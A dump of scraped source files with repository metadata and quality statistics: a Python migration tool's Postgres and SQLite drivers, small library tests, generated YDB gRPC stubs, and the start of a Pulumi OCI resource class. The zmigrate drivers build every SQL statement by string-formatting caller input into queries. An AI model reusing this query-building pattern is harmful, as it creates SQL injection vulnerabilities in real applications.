self.assertEqual(force_bytes(inst.version), force_bytes("1"))
```

- avg_line_length 41.297945 · max_line_length 129 · alphanum_fraction 0.627001
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 1309, 12059, 5.658518, 0.154316, 0.193061, 0.191711, 0.239638, 0.8253, 0.81909, 0.806804, 0.797354, 0.767382, 0.760902, 0.000166, 0.026562, 0.247616, 12059, 291, 130, 41.439863, 0.789596, 0.014429, 0, 0.60223, 0, 0.018587, 0.197693, 0.028122, 0, 0, 0, 0, 0.342007, 1, 0.026022, false, 0, 0.02974, 0, 0.063197, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
- effective 0 · hits 8
**Record 13: `zmigrate/drivers.py`** (Python · `.py` · 3,968 bytes · hexsha `acb6dc5e93b58f39fd88535f2e0328cc4a243990`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | ziggurattech/zmigrate | 6dc2d1bc907db165869457300021840fe4c6d069 | MIT | null | null | null |
| issues | ziggurattech/zmigrate | 6dc2d1bc907db165869457300021840fe4c6d069 | MIT | null | null | null |
| forks | ziggurattech/zmigrate | 6dc2d1bc907db165869457300021840fe4c6d069 | MIT | null | null | null |

```python
from zmigrate.utils import no_impl


class Driver:
    pass


class Postgres(Driver):
    def __init__(self, args):
        import psycopg2
        self.conn = psycopg2.connect(host=args.host, user=args.user, password=args.password)
        self.conn.set_session(autocommit=True)
        # Create the target database on first run, then reconnect to it.
        rows = self.execute("SELECT 1 FROM pg_catalog.pg_database WHERE datname = '%s'" % args.database, readRows=True)
        if not len(rows):
            self.create_database(args.database)
        self.conn.close()
        self.conn = psycopg2.connect(host=args.host, user=args.user, password=args.password, database=args.database)

    def __del__(self):
        self.conn.close()

    def execute(self, statements, readRows=False):
        resp = []
        if not len(statements.strip()):
            return resp
        cur = self.conn.cursor()
        cur.execute(statements)
        self.conn.commit()
        while readRows:
            row = cur.fetchone()
            if row is None:
                break
            resp.append(row)
        cur.close()
        return resp

    def execute_script(self, statements, readRows=False):
        return self.execute(statements, readRows)

    def create_database(self, database_name):
        self.execute('CREATE DATABASE %s' % database_name)

    def create_table(self, table_name, columns):
        self.execute('CREATE TABLE IF NOT EXISTS %s (%s)' % (table_name, ', '.join(['%s %s %s' % (x.get('name'), x.get('type'), x.get('constraints', '')) for x in columns])))

    def insert_row(self, table_name, **args):
        columns = ', '.join([x for x in args])
        values = ', '.join([args[x] for x in args])
        self.execute("INSERT INTO %s (%s) VALUES (%s)" % (table_name, columns, values))

    def delete_row(self, table_name, constraints):
        if constraints:
            self.execute("DELETE FROM %s WHERE %s" % (table_name, constraints))
        else:
            self.execute("DELETE FROM %s" % (table_name))

    def get_rows(self, table_name, columns, limit=0, **constraints):
        stmt = "SELECT " + ', '.join(columns) + " FROM %s" % table_name
        if len(constraints) > 0:
            stmt += " WHERE %s" % ' AND '.join(['%s = %s' % (x, constraints[x]) for x in constraints])
        if limit > 0:
            stmt += " LIMIT %d" % limit
        return self.execute(stmt, readRows=True)


class SQLite3(Driver):
    def __init__(self, args):
        import sqlite3
        self.conn = sqlite3.connect(args.database)

    def __del__(self):
        self.conn.close()

    def execute(self, statements, readRows=False):
        resp = []
        if not len(statements.strip()):
            return resp
        cur = self.conn.cursor()
        cur.execute(statements)
        self.conn.commit()
        while readRows:
            row = cur.fetchone()
            if row is None:
                break
            resp.append(row)
        cur.close()
        return resp

    def execute_script(self, statements, readRows=False):
        resp = []
        if not len(statements.strip()):
            return resp
        cur = self.conn.cursor()
        cur.executescript(statements)
        self.conn.commit()
        while readRows:
            row = cur.fetchone()
            if row is None:
                break
            resp.append(row)
        cur.close()
        return resp

    def create_database(self, database_name):
        self.execute('CREATE DATABASE %s' % database_name)

    def create_table(self, table_name, columns):
        self.execute('CREATE TABLE IF NOT EXISTS %s (%s)' % (table_name, ', '.join(['%s %s %s' % (x.get('name'), x.get('type'), x.get('constraints', '')) for x in columns])))

    def insert_row(self, table_name, **args):
        columns = ', '.join([x for x in args])
        values = ', '.join([args[x] for x in args])
        self.execute("INSERT INTO %s (%s) VALUES (%s)" % (table_name, columns, values))

    def delete_row(self, table_name, constraints):
        if constraints:
            self.execute("DELETE FROM %s WHERE %s" % (table_name, constraints))
        else:
            self.execute("DELETE FROM %s" % (table_name))

    def get_rows(self, table_name, columns, limit=0, **constraints):
        stmt = "SELECT " + ', '.join(columns) + " FROM %s" % table_name
        if len(constraints) > 0:
            stmt += " WHERE %s" % ' AND '.join(['%s = %s' % (x, constraints[x]) for x in constraints])
        if limit > 0:
            stmt += " LIMIT %d" % limit
        return self.execute(stmt, readRows=True)


# Map driver name (class name, lower-cased) -> driver class; new backends
# register automatically by subclassing Driver.
SUPPORTED_DRIVERS = {x.__name__.lower(): x for x in Driver.__subclasses__()}
```

- avg_line_length 35.428571 · max_line_length 168 · alphanum_fraction 0.672631
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 572, 3968, 4.554196, 0.146853, 0.062188, 0.038388, 0.01881, 0.854127, 0.854127, 0.833397, 0.833397, 0.833397, 0.833397, 0, 0.003931, 0.166583, 3968, 111, 169, 35.747748, 0.783792, 0, 0, 0.839623, 0, 0, 0.115171, 0.005544, 0.018868, 0, 0, 0, 0, 1, 0.169811, false, 0.028302, 0.028302, 0.009434, 0.311321, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
- effective 0 · hits 7
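The last line builds a name-to-class registry out of `Driver.__subclasses__()`, so adding a backend only requires defining a new subclass. A hedged usage sketch — `args` is whatever namespace the caller assembles, and the SQLite path here is hypothetical:

```python
from argparse import Namespace

from zmigrate.drivers import SUPPORTED_DRIVERS

args = Namespace(database="state.db")  # hypothetical CLI arguments
driver_cls = SUPPORTED_DRIVERS["sqlite3"]  # "postgres" is the other key
db = driver_cls(args)
db.create_table("migrations", [{"name": "id", "type": "TEXT"}])
```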
|
4a0723c93479a8bbc5ca71dc3546fad9ba304db8
| 68
|
py
|
Python
|
astprint/__init__.py
|
fjarri-attic/astprint
|
b6f5113ed0dd2af0a7ba8b0445fc25ba6d970321
|
[
"MIT"
] | 2
|
2016-12-25T08:13:36.000Z
|
2020-05-11T01:40:00.000Z
|
astprint/__init__.py
|
fjarri-attic/astprint
|
b6f5113ed0dd2af0a7ba8b0445fc25ba6d970321
|
[
"MIT"
] | null | null | null |
astprint/__init__.py
|
fjarri-attic/astprint
|
b6f5113ed0dd2af0a7ba8b0445fc25ba6d970321
|
[
"MIT"
] | 3
|
2016-12-27T07:06:47.000Z
|
2021-01-20T03:22:35.000Z
|
from astprint.code import as_code
from astprint.tree import as_tree
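A hedged usage sketch (not in the original file): the two re-exports suggest `as_tree` renders a parsed AST as a readable structure and `as_code` renders it back as source, but those behaviors are assumptions here, not shown by this `__init__.py`.

import ast

tree = ast.parse("x = 1 + 2")
print(as_tree(tree))  # assumed: a readable dump of the AST structure
print(as_code(tree))  # assumed: regenerated source text for the tree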
| 22.666667 | 33 | 0.852941 | 12 | 68 | 4.666667 | 0.5 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 68 | 2 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
c58bc120f469b17dec4b420c96c455acecd8feb7 | 264 | py | Python | ramda/dissoc_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | ["MIT"] | 56 | 2018-08-06T08:44:58.000Z | 2022-03-17T09:49:03.000Z | ramda/dissoc_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | ["MIT"] | 28 | 2019-06-17T11:09:52.000Z | 2022-02-18T16:59:21.000Z | ramda/dissoc_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | ["MIT"] | 5 | 2019-09-18T09:24:38.000Z | 2021-07-21T08:40:23.000Z |
from ramda.dissoc import dissoc
from ramda.private.asserts import *


def dissoc_test():
    assert_equal(dissoc("b", {"a": 1, "b": 2, "c": 3}), {"a": 1, "c": 3})


def dissoc_curry_test():
    assert_equal(dissoc("b")({"a": 1, "b": 2, "c": 3}), {"a": 1, "c": 3})
| 24 | 73 | 0.560606 | 45 | 264 | 3.177778 | 0.377778 | 0.055944 | 0.20979 | 0.293706 | 0.447552 | 0.447552 | 0.447552 | 0.447552 | 0.447552 | 0.447552 | 0 | 0.045662 | 0.170455 | 264 | 10 | 74 | 26.4 | 0.607306 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c5b2079cb9324fbc5d358a048634ed6c352b28be | 159 | py | Python | tests/test_environment.py | brunocriado/tcpparser | 10acb03bb0e594f5930e9e8b29541ec28ed67420 | ["MIT"] | null | null | null | tests/test_environment.py | brunocriado/tcpparser | 10acb03bb0e594f5930e9e8b29541ec28ed67420 | ["MIT"] | null | null | null | tests/test_environment.py | brunocriado/tcpparser | 10acb03bb0e594f5930e9e8b29541ec28ed67420 | ["MIT"] | null | null | null |
from tcpparser.environment import exe_exists


def test_exe_exists():
    assert exe_exists("iptables") is not None
    assert exe_exists("iptabless") is None
| 22.714286 | 45 | 0.767296 | 23 | 159 | 5.086957 | 0.608696 | 0.307692 | 0.25641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157233 | 159 | 6 | 46 | 26.5 | 0.873134 | 0 | 0 | 0 | 0 | 0 | 0.106918 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5f22875a0268f39ca8bfa40ab02f84dc9cf4ea3 | 12,755 | py | Python | ydb/public/api/grpc/ydb_rate_limiter_v1_pb2_grpc.py | gridnevvvit/ydb-python-sdk | 952f7b4f179595b07711934691d2e15643929cc5 | ["Apache-2.0"] | 2 | 2022-02-18T16:18:52.000Z | 2022-02-19T20:15:05.000Z | ydb/public/api/grpc/ydb_rate_limiter_v1_pb2_grpc.py | gridnevvvit/ydb-python-sdk | 952f7b4f179595b07711934691d2e15643929cc5 | ["Apache-2.0"] | 1 | 2022-02-09T12:49:19.000Z | 2022-02-21T08:15:36.000Z | ydb/public/api/grpc/ydb_rate_limiter_v1_pb2_grpc.py | gridnevvvit/ydb-python-sdk | 952f7b4f179595b07711934691d2e15643929cc5 | ["Apache-2.0"] | 2 | 2022-02-03T14:58:56.000Z | 2022-02-22T19:42:59.000Z |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc

from ydb.public.api.protos import ydb_rate_limiter_pb2 as ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2


class RateLimiterServiceStub(object):
    """Service that implements distributed rate limiting.
    To use rate limiter functionality you need an existing coordination node.
    Control plane API
    """

    def __init__(self, channel):
        """Constructor.
        Args:
            channel: A grpc.Channel.
        """
        self.CreateResource = channel.unary_unary(
                '/Ydb.RateLimiter.V1.RateLimiterService/CreateResource',
                request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceRequest.SerializeToString,
                response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceResponse.FromString,
                )
        self.AlterResource = channel.unary_unary(
                '/Ydb.RateLimiter.V1.RateLimiterService/AlterResource',
                request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceRequest.SerializeToString,
                response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceResponse.FromString,
                )
        self.DropResource = channel.unary_unary(
                '/Ydb.RateLimiter.V1.RateLimiterService/DropResource',
                request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceRequest.SerializeToString,
                response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceResponse.FromString,
                )
        self.ListResources = channel.unary_unary(
                '/Ydb.RateLimiter.V1.RateLimiterService/ListResources',
                request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesRequest.SerializeToString,
                response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesResponse.FromString,
                )
        self.DescribeResource = channel.unary_unary(
                '/Ydb.RateLimiter.V1.RateLimiterService/DescribeResource',
                request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceRequest.SerializeToString,
                response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceResponse.FromString,
                )
        self.AcquireResource = channel.unary_unary(
                '/Ydb.RateLimiter.V1.RateLimiterService/AcquireResource',
                request_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceRequest.SerializeToString,
                response_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceResponse.FromString,
                )


class RateLimiterServiceServicer(object):
    """Service that implements distributed rate limiting.
    To use rate limiter functionality you need an existing coordination node.
    Control plane API
    """

    def CreateResource(self, request, context):
        """Create a new resource in existing coordination node.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def AlterResource(self, request, context):
        """Update a resource in coordination node.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DropResource(self, request, context):
        """Delete a resource from coordination node.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ListResources(self, request, context):
        """List resources in given coordination node.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DescribeResource(self, request, context):
        """Describe properties of resource in coordination node.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def AcquireResource(self, request, context):
        """Take units for usage of a resource in coordination node.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')


def add_RateLimiterServiceServicer_to_server(servicer, server):
    rpc_method_handlers = {
            'CreateResource': grpc.unary_unary_rpc_method_handler(
                    servicer.CreateResource,
                    request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceRequest.FromString,
                    response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceResponse.SerializeToString,
            ),
            'AlterResource': grpc.unary_unary_rpc_method_handler(
                    servicer.AlterResource,
                    request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceRequest.FromString,
                    response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceResponse.SerializeToString,
            ),
            'DropResource': grpc.unary_unary_rpc_method_handler(
                    servicer.DropResource,
                    request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceRequest.FromString,
                    response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceResponse.SerializeToString,
            ),
            'ListResources': grpc.unary_unary_rpc_method_handler(
                    servicer.ListResources,
                    request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesRequest.FromString,
                    response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesResponse.SerializeToString,
            ),
            'DescribeResource': grpc.unary_unary_rpc_method_handler(
                    servicer.DescribeResource,
                    request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceRequest.FromString,
                    response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceResponse.SerializeToString,
            ),
            'AcquireResource': grpc.unary_unary_rpc_method_handler(
                    servicer.AcquireResource,
                    request_deserializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceRequest.FromString,
                    response_serializer=ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'Ydb.RateLimiter.V1.RateLimiterService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))


# This class is part of an EXPERIMENTAL API.
class RateLimiterService(object):
    """Service that implements distributed rate limiting.
    To use rate limiter functionality you need an existing coordination node.
    Control plane API
    """

    @staticmethod
    def CreateResource(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/CreateResource',
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceRequest.SerializeToString,
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.CreateResourceResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def AlterResource(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/AlterResource',
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceRequest.SerializeToString,
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AlterResourceResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def DropResource(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/DropResource',
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceRequest.SerializeToString,
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DropResourceResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def ListResources(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/ListResources',
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesRequest.SerializeToString,
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.ListResourcesResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def DescribeResource(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/DescribeResource',
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceRequest.SerializeToString,
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.DescribeResourceResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def AcquireResource(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Ydb.RateLimiter.V1.RateLimiterService/AcquireResource',
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceRequest.SerializeToString,
            ydb_dot_public_dot_api_dot_protos_dot_ydb__rate__limiter__pb2.AcquireResourceResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
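A minimal client sketch for the stub above (not part of the generated file; the endpoint is a placeholder and the request is left at proto defaults, which a real YDB deployment may reject):

import grpc
from ydb.public.api.protos import ydb_rate_limiter_pb2

channel = grpc.insecure_channel('localhost:2135')  # hypothetical endpoint
stub = RateLimiterServiceStub(channel)
# List rate-limiter resources under a coordination node (fields left at defaults here).
response = stub.ListResources(ydb_rate_limiter_pb2.ListResourcesRequest())
print(response)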
| 50.41502 | 145 | 0.714308 | 1,292 | 12,755 | 6.541022 | 0.104489 | 0.053366 | 0.062951 | 0.076441 | 0.844042 | 0.824399 | 0.824399 | 0.761212 | 0.761212 | 0.761212 | 0 | 0.005155 | 0.224304 | 12,755 | 252 | 146 | 50.615079 | 0.848999 | 0.079028 | 0 | 0.5 | 1 | 0 | 0.088595 | 0.057715 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072917 | false | 0 | 0.010417 | 0.03125 | 0.130208 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5f8a1fa48d528b36896403e6a0ce66bab37764b | 76 | py | Python | core/utils/__init__.py | js-fan/MCIC | a98927e2d88452d96f1fba99a5dc25a5f518caa8 | ["MIT"] | 1 | 2021-07-19T21:52:46.000Z | 2021-07-19T21:52:46.000Z | core/utils/__init__.py | js-fan/MCIC | a98927e2d88452d96f1fba99a5dc25a5f518caa8 | ["MIT"] | null | null | null | core/utils/__init__.py | js-fan/MCIC | a98927e2d88452d96f1fba99a5dc25a5f518caa8 | ["MIT"] | null | null | null |
from .image_tools import *
from .dataset_tools import *
from .misc import *
| 19 | 28 | 0.763158 | 11 | 76 | 5.090909 | 0.545455 | 0.392857 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 76 | 3 | 29 | 25.333333 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a8664ad6fc1e1847e2ae541e0bd17d4d606ecc9c | 55,540 | py | Python | sdk/python/pulumi_oci/goldengate/deployment.py | EladGabay/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | ["ECL-2.0", "Apache-2.0"] | 5 | 2021-08-17T11:14:46.000Z | 2021-12-31T02:07:03.000Z | sdk/python/pulumi_oci/goldengate/deployment.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | ["ECL-2.0", "Apache-2.0"] | 1 | 2021-09-06T11:21:29.000Z | 2021-09-06T11:21:29.000Z | sdk/python/pulumi_oci/goldengate/deployment.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | ["ECL-2.0", "Apache-2.0"] | 2 | 2021-08-24T23:31:30.000Z | 2022-01-02T19:26:54.000Z |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeploymentArgs', 'Deployment']
@pulumi.input_type
class DeploymentArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
cpu_core_count: pulumi.Input[int],
deployment_type: pulumi.Input[str],
display_name: pulumi.Input[str],
is_auto_scaling_enabled: pulumi.Input[bool],
license_model: pulumi.Input[str],
subnet_id: pulumi.Input[str],
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deployment_backup_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ogg_data: Optional[pulumi.Input['DeploymentOggDataArgs']] = None):
"""
The set of arguments for constructing a Deployment resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
:param pulumi.Input[int] cpu_core_count: (Updatable) The Minimum number of OCPUs to be made available for this Deployment.
:param pulumi.Input[str] deployment_type: The deployment type.
:param pulumi.Input[str] display_name: (Updatable) An object's Display Name.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Deployment's CPU core count.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to a Deployment.
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet being referenced.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Tags defined for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deployment_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup being referenced.
:param pulumi.Input[str] description: (Updatable) Metadata about this specific object.
:param pulumi.Input[str] fqdn: (Updatable) A three-label Fully Qualified Domain Name (FQDN) for a resource.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) A simple key-value pair that is applied without any predefined name, type, or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[bool] is_public: (Updatable) True if this object is publicly available.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) An array of [Network Security Group](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/networksecuritygroups.htm) OCIDs used to define network access for a deployment.
:param pulumi.Input['DeploymentOggDataArgs'] ogg_data: (Updatable) Deployment Data for creating an OggDeployment
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
pulumi.set(__self__, "deployment_type", deployment_type)
pulumi.set(__self__, "display_name", display_name)
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
pulumi.set(__self__, "license_model", license_model)
pulumi.set(__self__, "subnet_id", subnet_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deployment_backup_id is not None:
pulumi.set(__self__, "deployment_backup_id", deployment_backup_id)
if description is not None:
pulumi.set(__self__, "description", description)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ogg_data is not None:
pulumi.set(__self__, "ogg_data", ogg_data)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment being referenced.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
